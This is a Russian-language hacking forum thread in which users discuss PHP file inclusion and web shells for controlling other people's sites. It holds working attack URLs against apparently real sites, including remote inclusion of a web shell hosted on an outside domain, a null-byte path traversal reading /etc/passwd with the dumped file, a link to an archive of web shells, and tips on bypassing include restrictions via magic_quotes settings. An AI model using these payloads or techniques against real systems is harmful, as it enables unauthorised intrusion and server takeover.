BlackDog веб шелл ето скрипт чаще на PHP для управления своим\чужим сайтом\сервером. шеллы можеш запускать на чужиш сайтах через php-ij (как ето делается я попоробовал обьясить ТУТ ) изучай!!!! Вот скачай етот АРХИВ там подборка веб шеллов на любой вкус. Удачи
хм...вот что у меня выводится в адресную строку http://blablabla:82/?mod=lookbook Вот код функции которая производит инклуд PHP: function std_execute_mod( $mod_name, $mod_function ) { $mod_name = str_replace( '.php', '', $mod_name ); require_once( $GLOBALS['g_dir_mod'] . $mod_name . '.php' ); eval( '$out=' . $mod_name . '_' . $mod_function . ';' ); return $out; } $GLOBALS['g_dir_mod'] - тут папка mod можно ли как-то сделать пхп инъекцию?
http://www.eurogym.ru/index.php?lang_id=0&content_id=+11&p_content_id=0&sitemap=0&extfilename=http://www.google.com гы... осваиваемся потихоньку =)
Панки, залилть вы можете расказат ькак? Я только вижу шел который работает через их инклуд, на моем сервере шел. Я хочу залить на их.
Статья прикольная. У меня вопрос вот например я увидел на форуме вот такой "php injection" - http://блаблабла/main.php?page=../../../../etc/passwd%00 Открываю и вижу: ../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lpx:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var//mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0perator:/root:/sbin/nologin И еще очень много таково. Насколько я понимаю, то мы зашли в корневую директорию сайта, перешли в папку "etc" и открыли файл "passwd". Если ошибаюсь то поправьте. Но я не понял что мы увидели в этом файле??? Разъясните пожалуйста.
у меня вопрос по Web-shell. Я использую Web-shell CIH.[ms] открываю его с помощю php-injection. Но при попытке чтото зделать шел просто перезагружаеться и не выполняет никаких команд =( (_http://www.an-invest.ru/?id=http://poni-shell.nm.ru/sss) Можете подсказать вчем проблема ? буду очень благодарен.
Таже ситуация перепробывал кучу веб-шєлов они грузяться показывают каталог с файлами а когда я хочу загрузить или перейти в другую папку они просто перезагружаються и опять показуют тотже каталог =(
на nm.ru вроде выполняются PHP (не уверен) вот http://www.an-invest.ru/?id=http://ziroday.narod.ru/antichat правда папок на запись там нет)
Я хотел бы еще сказать насчет терминологии: все таки статья про php инклюдинг, а не про php инъекцию php including - это подключение файлов, а php injection - это внедрение php кода например чтение /etc/passwd - никак не может быть инъекцией, т.к. никакого php кода не выполняется а php injection это исполнение php комманд или кода ну допустим через eval или preg_replace т.д.
Посмотрел бы вначале, когда статья была написана. P.S. PHP Include - это и есть PHP Injection (один из видов)
2NOmeR1 Я не думаю, что терминология со временем сильно изменилась, к тому же я не откапывал статью в недрах ачата, а ссылка на нее висела на головной странице форума а насчет: ну может ты и прав, но сразу вспоминается аналогия:
Да я вобщем то не придирался, я же не пишу срочно исправьте название, или афффтар не прав, просто написал насчет терминологии, да и то для меня это непринципиально,потому что как ты сказал:
помню с Нитроксом спорил на эту темы Вообще то инкдуинг - это именно include() или require(), ну я так считаю =)
че? какие еще линии? наркоман чтоле. не получится у тебя в случае если урл акцес дизейблид.. тогда при меджик квоутс офф можешь локальные файлы подрубать. если же и они врублены, то тебе не повезло
Не ну я конешно еше мало чё понимаю и етого неотрицаю... Имел ввиду я ето если незаметил то в конце написано on line 3 (ето я и имел ввиду) а в моём варианте 63 нашёт етого можно поподробней а тоя чето неочень понял запрещён инклуд удалённых файлов, т.е вида (http://site/shell.php) а можно только подключать локальные (используя либо полный путь, либо отностительный) При выключенном параметре меджик квоутс кавычки не слэшируются, поэтому их можно использовать при указании полного пути подключаемого файла. Надеюсь понятно объяснил. -=lebed=- ЗЫ попрошу неназывать мя наркаманом,ето не правда
